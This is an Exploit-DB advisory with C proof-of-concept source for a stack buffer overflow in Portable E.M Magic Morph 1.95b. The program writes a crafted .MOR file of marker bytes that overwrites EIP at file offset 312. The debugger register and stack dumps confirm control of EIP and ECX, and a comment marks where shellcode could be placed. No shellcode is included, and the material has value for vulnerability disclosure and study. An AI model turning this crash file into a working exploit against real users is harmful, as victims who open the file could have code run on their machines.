vendor:
Magic Morph
by:
fl0 fl0w
7.5
CVSS
HIGH
Stack Buffer Overflow
Not provided
CWE
Product Name: Magic Morph
Affected Version From: 1.95b
Affected Version To: 1.95b
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
Not provided

Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC

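This is a proof of concept for a stack buffer overflow in Portable E.M Magic Morph 1.95b, triggered when the application opens a specially crafted .MOR file. The PoC program writes such a file; the four bytes that overwrite EIP sit at file offset 312 (0x138 hex), which can be confirmed by opening the generated file in a hex editor and counting from the start. The author found this offset with a technique they call 'stack spray': the file is filled with runs of distinct marker bytes, so the value seen in a register identifies its position in the file. The CPU registers recorded at the time of the crash are: EAX=00000000, ECX=33333333, EDX=01492288, EBX=00000001, ESP=0012EF7C, EIP=41414141. The payload consists only of these marker characters and symbols; the listing contains no shellcode.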

Mitigation:

No patch is listed for the affected version (1.95b), so the vendor would need to release a fix for the stack buffer overflow. In the meantime, users should avoid opening or processing .MOR files from untrusted sources.
Source

Exploit-DB raw data:

   /*********************************************************************
    Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC  *
    By fl0 fl0w                                                         *
    "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!"  *                               
   **********************************************************************/
   

  /********************************************************************************************************
   The EIP offset is at 312 bytes (0x138 hex).                                                            *
   After you compile and create the .MOR file, open it in a hex editor and count from the start           *
   of the file; you should arrive at 0x138 bytes.                                                         *
                                                                                                          *
   I used a technique named "stack spray" to determine the offset: the file is filled with runs of        *
   distinct marker bytes, so the value seen in a register identifies its position in the file.            *
                                                                                                          * 
   CPU REGISTERS                                                                                          *  
   EAX 00000000                                                                                           *
   ECX 33333333                                                                                           *
   EDX 01492288                                                                                           *
   EBX 00000001                                                                                           *
                                                                                                          *
   ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   *
   ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY       *
   XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223                                             *
   EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY   *
   YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b   *
   bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa                                                 *
                                                                                                          * 
   ESI 00F369B0                                                                                           *
   EDI 00F369B0                                                                                           *
   EIP 41414141                                                                                           *
                                                                                                          * 
   We control ECX and EIP, which is more than enough to copy whatever addresses you want into memory.     *
   In OllyDbg I selected the ESP register and chose right click -> Follow in stack; I observed that the   *
   corruption starts at a much lower address.                                                             *
   This is what ESP points to:                                                                            *
   ******************************************************************************************************** 
  */ 
   
   /************************
     STACK                 * 
     0012EF7C   62343434   *                                                                               
     0012EF80   62626262   *
     0012EF84   62626262   *
     0012EF88   67676262   *
     0012EF8C   67676767   *
     0012EF90   67676767   *
     0012EF94   67676767   *
     0012EF98   62676767   *
     0012EF9C   61616161   *
     0012EFA0   61616161   *
     0012EFA4   61616161   *
     0012EFA8   61616161   *
     0012EFAC   61616161   *
     0012EFB0   61616161   * 
     0012EFB4   61616161   * 
     0012EFB8   61616161   *
     0012EFBC   61616161   *
     0012EFC0   61616161   *
     0012EFC4   61616161   *
     0012EFC8   61616161   *
     0012EFCC   60606060   *
     0012EFD0   60606060   *
     0012EFD4   60606060   *
     0012EFD8   60606060   *
     0012EFDC   60606060   *
     0012EFE0   60606060   *
     0012EFE4   60606060   *
     0012EFE8   60606060   *  
     0012EFF0   60606060   *
     0012EFF4   60606060   *
     0012EFF8   60606060   *
     0012EFFC   59595959   *
     0012F000   59595959   *
     0012F004   59595959   *
     0012F008   59595959   *
     0012F00C   59595959   *
     ..................... *
     ***********************
*/


/*************************************************
You can copy your shellcode starting from here : *
    0012EC3C   63636363                          *
                                                 * 
 0x12EF80 = 1240960 ->NOT-> A                    * 
                                                 * 
 0x12EC3C = 1240124 ->NOT-> B                    * 
                                                 *
 A > B                                           * 
 A - B = 836 = 0x344                             *  
 So the stack gets corrupted a long way from ESP.*
 *************************************************
 */
 
 

  /************************************************* 
   LOOK OF THE DUMP                                * 
   0012EE4C              63 63 63 63      cccc     *
   0012EE54  63 63 63 63 63 63 63 63  cccccccc     *
   0012EE5C  32 32 32 32 32 32 32 32  22222222     *
   0012EE64  32 33 33 33 33 33 33 33  23333333     *
   0012EE6C  33 33 33 66 66 66 66 66  333fffff     *
   0012EE74  41 41 41 41 77 77 34 34  AAAAww44     *
   0012EE7C  34 34 34 62 62 62 62 62  444bbbbb     *
   0012EE84  62 62 62 62 62 62 67 67  bbbbbbgg     *
   0012EE8C  67 67 67 67 67 67 67 67  gggggggg     *
   0012EE94  67 67 67 67 67 67 67 62  gggggggb     *
   0012EE9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EECC  60 60 60 60 60 60 60 60  ````````     *
   0012EED4  60 60 60 60 60 60 60 60  ````````     *
   0012EEDC  60 60 60 60 60 60 60 60  ````````     *
   0012EEE4  60 60 60 60 60 60 60 60  ````````     *
   0012EEEC  60 60 60 60 60 60 60 60  ````````     *
   0012EEF4  60 60 60 60 60 60 60 60  ````````     *
   0012EEFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF04  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF0C  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF14  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF1C  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF24  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF2C  58 58 58 58 58 58 58 58  XXXXXXXX     *
   0012EF34  58 58 58 58 58 58 58 58  XXXXXXXX     *
   0012EF3C  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF44  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF4C  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF54  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF5C  32 32 32 32 32 32 32 32  22222222     *
   0012EF64  32 33 33 33 33 33 33 33  23333333     *
   0012EF6C  33 33 33 66 66 66 66 66  333fffff     *
   0012EF74  41 41 41 41 77 77 34 34  AAAAww44     *
   0012EF7C  34 34 34 62 62 62 62 62  444bbbbb     *
   0012EF84  62 62 62 62 62 62 67 67  bbbbbbgg     *
   0012EF8C  67 67 67 67 67 67 67 67  gggggggg     *
   0012EF94  67 67 67 67 67 67 67 62  gggggggb     *
   0012EF9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFCC  60 60 60 60 60 60 60 60  ````````     *
   0012EFD4  60 60 60 60 60 60 60 60  ````````     *
   0012EFDC  60 60 60 60 60 60 60 60  ````````     *
   0012EFE4  60 60 60 60 60 60 60 60  ````````     *
   0012EFEC  60 60 60 60 60 60 60 60  ````````     *
   0012EFF4  60 60 60 60 60 60 60 60  ````````     *
   0012EFFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012F004  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012F00C  59 59 59 59 59 59 59 59  YYYYYYYY     *
  *************************************************
  */ 
  
  /**************************************************************************************
    Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org               * 
    Special greetz to OSHO,!_30,str0ke,Carcabot.                                                 *  
    Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *
    http://www.sploitz.10001mb.com                                                      *
  *************************************************************************************
  */
  
  /*************************************************************************
  DEMO                                                                     *            
  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe           *
  *********************************************************************    *
                Magic Morph .MOR File Stack Buffer Overflow POC            * 
  The usage is:                                                            *  
                All Credits fl0 fl0w                                       *   
                                                                           *    
        -f       FILE.mor                                                  *     
  ************************************************************************** 
                                                                           *      
  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST   *
  File DONE !                                                              *
  **************************************************************************
  */
  
  /*****************************************************************************************
  Technical details                                                                        *
  This program was compiled with DEV-Cpp and tested successfully on MS Windows XP SP3      *
  You can download the POC along with debugging details from my website                    *
  
  Preview ...                                                                              * 
  ......                                                                                   *  
  This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)* 
  and the software Portable E.M Magic Morph 1.95b.                                                                        *   
  ALL CREDITS GO TO fl0 fl0w for this exploit !                                            *
  http://www.sploitz.10001mb.com/                                                          * 
   ...........................                                                             *  
  ******************************************************************************************   
  */
  //START Algorithm
 #include "stdio.h"
 #include "string.h"
 #include "stdlib.h"
 #include "windows.h"
 #include "stdint.h"
 #include "getopt.h"
 /* Record of three one-byte fields, exposed under the short alias F. */
 typedef struct flo {
     uint8_t a, b, c;
 } F;
         
  

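 /*
  * buildFile - write the proof-of-concept .MOR test file to `fname`.
  *
  * The output is the 3-byte prefix "C:\" followed by hexfileP1, hexfileP2 and
  * hexfileP3, 1016 bytes in total.  The tables hold two ASCII paths ending in
  * ".jpg" (presumably the images a morph project refers to - not confirmed by
  * this file), zero padding, and runs of distinct marker bytes (0x41, 0x63,
  * 0x32, 0x33, ...).  No executable payload is present.  The four 0x41 bytes
  * in the 0x33/0x66/0x41/0x77 row of hexfileP1 land at file offset 312
  * (0x138), the offset the header comment reports for EIP.
  *
  * fname: path of the file to create.  It is opened with "wb", so an existing
  *        file of that name is truncated.
  *
  * Returns nothing.  When the file cannot be opened or a write comes up
  * short, a message goes to stderr and the function returns; the caller is
  * not told about the failure because the signature is void.
  */
 void buildFile(char *fname)
 {
     /* First path string (continues the "C:\" prefix), padding, then markers. */
     static const uint8_t hexfileP1[] = {
         0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64,
         0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E,
         0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73,
         0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
         0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
         0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
         0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
         0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
         0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
         0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33,
         0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34,
         0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67,
         0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62,
     };

     /* Marker runs only: 0x61, 0x60, 0x59, 0x58, 0x56. */
     static const uint8_t hexfileP2[] = {
         0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
         0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
         0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
         0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
         0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
         0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
         0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
         0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
         0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
         0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
         0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
         0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
         0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
     };

     /* Tail of the 0x56 run, padding, the second path string, then padding. */
     static const uint8_t hexfileP3[] = {
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
         0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73,
         0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74,
         0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74,
         0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C,
         0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     };

     /*
      * "C:\" - the same three bytes the original produced by heap-allocating
      * a 3-byte struct and copying sizeof(pointer) bytes out of it, which
      * read past the allocation and never freed it.
      */
     static const uint8_t prefix[] = { 0x43, 0x3A, 0x5C };

     FILE *f;
     int ok;

     if (fname == NULL) {
         fprintf(stderr, "buildFile: no output file name given\n");
         return;
     }

     f = fopen(fname, "wb");
     if (f == NULL) {
         /* The original passed a NULL stream straight to fwrite(). */
         perror(fname);
         return;
     }

     ok = fwrite(prefix, sizeof prefix[0], sizeof prefix, f) == sizeof prefix
       && fwrite(hexfileP1, sizeof hexfileP1[0], sizeof hexfileP1, f) == sizeof hexfileP1
       && fwrite(hexfileP2, sizeof hexfileP2[0], sizeof hexfileP2, f) == sizeof hexfileP2
       && fwrite(hexfileP3, sizeof hexfileP3[0], sizeof hexfileP3, f) == sizeof hexfileP3;

     /* fclose() flushes buffered data, so its result matters for a write stream. */
     if (fclose(f) != 0) {
         ok = 0;
     }
     if (!ok) {
         fprintf(stderr, "buildFile: incomplete write to %s\n", fname);
     }
 }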
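   /*
    * args - walk the command line with getopt(), accepting only "-f <file>".
    *
    * argc/argv: the program's argument vector, as received by main().
    *
    * Any option other than -f, or -f without a value, ends the process with
    * exit(-1).  The parsed file name is kept in a local only and then
    * discarded; main() in this file does not call this function and reads
    * argv[2] directly instead.
    *
    * Changes from the original: the uninitialised read of the option variable
    * before the loop is gone, the option string is "f:" so getopt() actually
    * fills optarg for -f, the loop ends on -1 (getopt's documented end value)
    * and the pointer is no longer squeezed into an int.
    */
   void args(int argc, char *argv[])
   {
       const char *file = NULL;
       int opt;

       while ((opt = getopt(argc, argv, "f:")) != -1) {
           switch (opt) {
           case 'f':
               file = optarg;
               break;
           default:
               exit(-1);
           }
       }

       (void)file;   /* nothing consumes the value yet */
   }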
    /*
     * Usage - clear the console and print the banner lines to stdout.
     *
     * Name: accepted for the caller's convenience but not used.
     *
     * The screen is cleared by handing "CLS" to system(), i.e. through the
     * host command processor, so this only works where that command exists.
     */
    void Usage (char *Name)
    {
        (void)Name;

        system("CLS");
        fputs("*********************************************************************\n", stdout);
        fputs("\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n", stdout);
        fputs("The usage is:\n", stdout);
        fputs("\t\tAll Credits fl0 fl0w\n", stdout);
    }
     /* Menu - print the single supported option and a closing rule to stderr. */
     void Menu()
     {
         static const char option_help[] =
             "\n"
             "\t-f       FILE.mor\n"
             "*********************************************************************"
             "\n";

         fputs(option_help, stderr);
     }
   
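  /*
   * main - build "<argv[2]>.mor" via buildFile().
   *
   * Expected invocation (see Menu): mm.exe -f NAME.  argv[1] is not inspected;
   * only argv[2] is used, as in the original.
   *
   * Returns 0 after buildFile() has been called.  Exits with -1 after printing
   * the usage text when fewer than two arguments follow the program name, and
   * returns -1 when the requested name does not fit the local buffer.
   *
   * Changes from the original: the argument check now covers argv[2] (it used
   * to test argc < 2 and then dereference argv[2], which is NULL when only one
   * argument is given), and the unbounded strcpy/strcat into a 100-byte stack
   * buffer is replaced by a length-checked snprintf.
   */
  int main(int argc, char *argv[])
  {
      char b[100];
      int n;

      if (argc < 3 || argv[2] == NULL) {
          Usage(argv[0]);
          Menu();
          exit(-1);
      }

      /* ".mor" plus the terminator take 5 of the 100 bytes. */
      n = snprintf(b, sizeof b, "%s.mor", argv[2]);
      if (n < 0 || (size_t)n >= sizeof b) {
          fprintf(stderr, "File name too long (limit is %u characters)\n",
                  (unsigned)(sizeof b - 5));
          return -1;
      }

      buildFile(b);
      printf("File DONE !\n");
      return 0;
  }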
 //END Algorithm

// milw0rm.com [2009-09-14]